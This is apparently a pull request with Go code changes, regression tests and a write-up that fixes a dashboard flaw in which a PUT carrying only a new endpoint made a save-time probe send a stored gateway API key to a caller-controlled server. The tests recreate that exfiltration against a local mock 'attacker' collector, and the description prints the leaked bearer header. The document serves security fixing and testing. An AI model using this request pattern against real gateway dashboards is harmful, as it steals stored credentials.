### PR TITLE
🔒 fix(dashboard): never probe a caller-supplied endpoint with a stored key

### DIFF
--- a/v2/pkg/dashboard/gateways.go
+++ b/v2/pkg/dashboard/gateways.go
@@ -338,8 +338,34 @@ func (s *Server) handleGovernorGatewaysUpsert(w http.ResponseWriter, r *http.Req
 	// agent 401s later. Uses the just-submitted key when present (the key file
 	// may not reflect it in the same request on some volumes).
 	resp := map[string]interface{}{"ok": true, "status": "updated", "gateway": gatewaySectionResponse(gw)}
-	if probe := s.gatewayProbeResult(gw, submittedKey); probe != nil {
-		resp["probe"] = probe
+	// SECURITY (audit F6, CWE-200): probe with the SUBMITTED key only, never a
+	// stored one.
+	//
+	// This handler preserves a previously-stored api_key_file when the caller
+	// omits a key (intended — see TestGatewaysUpsert_PreservesKeyOnEdit) while
+	// taking the endpoint from the request body. Probing with the resolved key
+	// chained those into an exfiltration primitive: one PUT naming an existing
+	// gateway, supplying only a new endpoint, walked the stored credential to a
+	// server the caller controls. The caller never had to know the key.
+	//
+	// Blanket private-IP denial is the wrong fix — in-cluster gateways are
+	// legitimate and it would break them. The invariant that actually holds is
+	// narrower: a credential the caller did not supply must never be sent to an
+	// endpoint the caller did. When the caller submits the key, they already
+	// possess it, so probing their endpoint discloses nothing new.
+	if submittedKey != "" {
+		if probe := s.gatewayProbeResult(gw, submittedKey); probe != nil {
+			resp["probe"] = probe
+		}
+	} else {
+		// No new key: the endpoint may have changed, so a stored credential is
+		// not ours to send. Verifying it stays possible via the separate
+		// /gateways/{name}/test route, which probes a gateway's own PERSISTED
+		// endpoint rather than one supplied in this request.
+		resp["probe"] = map[string]interface{}{
+			"ok":      false,
+			"skipped": "no key submitted — endpoint not probed with the stored credential; use the gateway test action to verify",
+		}
 	}
 	jsonResponse(w, resp)
 }

--- a/v2/pkg/dashboard/gateways_test.go
+++ b/v2/pkg/dashboard/gateways_test.go
@@ -94,6 +94,76 @@ func TestGatewaysUpsert_StoresKeyAsFileRef(t *testing.T) {
 	}
 }
 
+// Audit F6 (CWE-200/CWE-918). The upsert handler deliberately PRESERVES a
+// previously-stored api_key_file when the caller omits a key (see
+// TestGatewaysUpsert_PreservesKeyOnEdit — that behaviour is wanted), while
+// taking the endpoint straight from the request body. The save-time probe then
+// resolved the stored key and sent it to that endpoint as a bearer token.
+//
+// Chained, those two reasonable behaviours are an exfiltration primitive: a
+// single PUT naming an existing gateway, supplying only a new endpoint and no
+// key, walks the stored credential to a server the caller controls. The caller
+// never needs to know the key — they just need somewhere to catch it.
+//
+// This is the residual of the deferred half of #3164: confinement stopped
+// arbitrary FILE reads, but said nothing about where an already-resolved key
+// could be SENT. The fix is not to block private IPs — in-cluster gateways are
+// legitimate — but to never pair a STORED credential with a CALLER-SUPPLIED
+// endpoint.
+func TestF6_UpsertProbeDoesNotSendStoredKeyToCallerEndpoint(t *testing.T) {
+	srv := newFullServer(t)
+	dir := t.TempDir()
+	orig := gatewaySecretsDir
+	gatewaySecretsDir = dir
+	t.Cleanup(func() { gatewaySecretsDir = orig })
+
+	// Treat the temp dir as an allowed secrets root. Without this the #3164
+	// confinement rejects the path, ResolveAPIKey returns "", and the test
+	// passes VACUOUSLY — no key resolved means no key to leak, which proves
+	// nothing about the probe. Production reads from a genuinely allowed root,
+	// so the test has to as well.
+	defer config.AllowSecretFileRoot(dir)()
+
+	const stored = "sk-victim-stored-key-abcdef0123456789"
+	keyPath := dir + "/gateway_corp_api_key"
+	if err := os.WriteFile(keyPath, []byte(stored), 0o600); err != nil {
+		t.Fatalf("seed key file: %v", err)
+	}
+
+	// Stands in for the attacker's collector.
+	var got []string
+	attacker := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		got = append(got, r.Header.Get("Authorization"))
+		w.Header().Set("Content-Type", "application/json")
+		w.Write([]byte(`{"data":[]}`))
+	}))
+	defer attacker.Close()
+
+	srv.deps.Config.Governor.Gateways = []config.GatewayConfig{
+		{Name: "corp", Kind: "litellm", Endpoint: "https://corp.internal/v1", APIKeyFile: keyPath},
+	}
+
+	// Only the endpoint changes. No api_key, no api_key_file.
+	body := `{"name":"corp","kind":"litellm","endpoint":"` + attacker.URL + `"}`
+	req := httptest.NewRequest("PUT", "/api/config/governor/gateways", strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+	srv.handleGovernorGatewaysUpsert(w, req)
+
+	// Positive control. If the key never resolves (a mis-seeded root, a
+	// confinement change) there is nothing to leak and the assertion below is
+	// vacuous. Pin that the scenario is genuinely loaded first.
+	if gw := srv.deps.Config.Governor.Gateways[0]; gw.ResolveAPIKey() != stored {
+		t.Fatalf("test is vacuous: stored key did not resolve (got %q) — the leak assertion would pass for the wrong reason", gw.ResolveAPIKey())
+	}
+
+	for _, h := range got {
+		if strings.Contains(h, stored) {
+			t.Fatalf("F6: stored gateway key exfiltrated to a caller-supplied endpoint via the save-time probe (Authorization: %q)", h)
+		}
+	}
+}
+
 // TestGatewaysUpsert_RejectsInvalidEndpoint ensures a bad endpoint is a 400 and
 // leaves config untouched.
 func TestGatewaysUpsert_RejectsInvalidEndpoint(t *testing.T) {
@@ -178,5 +248,49 @@ func TestGatewaysUpsert_PreservesKeyOnEdit(t *testing.T) {
 	}
 	if gw.DefaultModel != "gpt-4o-mini" {
 		t.Errorf("default_model not updated: %q", gw.DefaultModel)
+	}
+}
+
+// The F6 fix points operators at the /gateways/{name}/test route to verify a
+// gateway whose key they did not resupply. That advice is only sound if the
+// route probes the gateway's PERSISTED endpoint and gives the caller no way to
+// inject one — otherwise it is the same primitive behind a different URL.
+func TestF6_TestRouteUsesPersistedEndpointNotCallerSupplied(t *testing.T) {
+	srv := newFullServer(t)
+	dir := t.TempDir()
+	orig := gatewaySecretsDir
+	gatewaySecretsDir = dir
+	t.Cleanup(func() { gatewaySecretsDir = orig })
+	defer config.AllowSecretFileRoot(dir)()
+
+	const stored = "sk-victim-stored-key-abcdef0123456789"
+	keyPath := dir + "/gateway_corp_api_key"
+	if err := os.WriteFile(keyPath, []byte(stored), 0o600); err != nil {
+		t.Fatalf("seed key file: %v", err)
+	}
+
+	var got []string
+	attacker := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		got = append(got, r.Header.Get("Authorization"))
+		w.Header().Set("Content-Type", "application/json")
+		w.Write([]byte(`{"data":[]}`))
+	}))
+	defer attacker.Close()
+
+	// Persisted endpoint is NOT the attacker's.
+	srv.deps.Config.Governor.Gateways = []config.GatewayConfig{
+		{Name: "corp", Kind: "litellm", Endpoint: "http://127.0.0.1:1/v1", APIKeyFile: keyPath},
+	}
+
+	// Try to steer the probe via body and query string.
+	body := `{"endpoint":"` + attacker.URL + `"}`
+	req := httptest.NewRequest("POST", "/api/config/governor/gateways/corp/test?endpoint="+attacker.URL, strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+	req.SetPathValue("name", "corp")
+	w := httptest.NewRecorder()
+	srv.handleGovernorGatewaysTest(w, req)
+
+	if len(got) != 0 {
+		t.Fatalf("F6: the test route probed a CALLER-SUPPLIED endpoint (%d hits, auth=%v) — it must only use the persisted one", len(got), got)
 	}
 }


### PR DESCRIPTION
## What

Audit **F6** (CWE-200, `SECURITY-REVIEW-2026-08-11.md`), and the residual of the half of N8 I deferred in #3164.

Two individually-correct behaviours chain into an exfiltration primitive:

1. The upsert handler **preserves** a stored `api_key_file` when the caller omits a key (intended — `TestGatewaysUpsert_PreservesKeyOnEdit` pins it).
2. It takes `endpoint` **straight from the request body**.
3. The save-time probe then resolved the stored key and sent it to that endpoint.

So a single `PUT` naming an existing gateway, carrying only a new endpoint and **no key**, walks the stored credential to a server the caller controls. Verified live in a test harness before fixing:

```
attacker hits=1 auth=[Bearer sk-victim-stored-key-abcdef0123456789]
```

The caller never needs to know the key — only somewhere to catch it.

## The fix

Probe with the **submitted** key only. When the caller supplies the key they already possess it, so probing their endpoint discloses nothing new. When they don't, the stored credential is not ours to send to an endpoint they chose.

A gateway whose key was not resupplied is still verifiable through `/gateways/{name}/test`, which probes the gateway's **persisted** endpoint. I did not take that on faith — `TestF6_TestRouteUsesPersistedEndpointNotCallerSupplied` asserts that route ignores a caller-supplied endpoint in both the body and the query string, because recommending it is only sound if it's actually true.

**Deliberately not fixed by denying private IPs.** In-cluster gateways are legitimate and blanket denial breaks them. The invariant that actually holds is narrower: *a credential the caller did not supply must never be sent to an endpoint the caller did.*

## A note on the test, because it nearly fooled me

The first version of this regression **passed against the vulnerable code**. Not because the code was safe — because the #3164 confinement rejected the temp-dir key path, so `ResolveAPIKey()` returned `""` and there was no key to leak. A clean result for entirely the wrong reason.

It needs `config.AllowSecretFileRoot` to reflect how production actually reads keys, and it now carries a **positive control** that fails loudly if the key ever stops resolving, rather than silently reporting a false clean.

## Verification

- `go build ./...` clean
- `go test ./pkg/dashboard/ -count=1` → `ok` (22.8s), full package, zero failures
- Reverting the fix makes the regression fail with the `Bearer sk-victim-...` leak above
- Existing upsert tests, including `PreservesKeyOnEdit`, still pass — key preservation is unchanged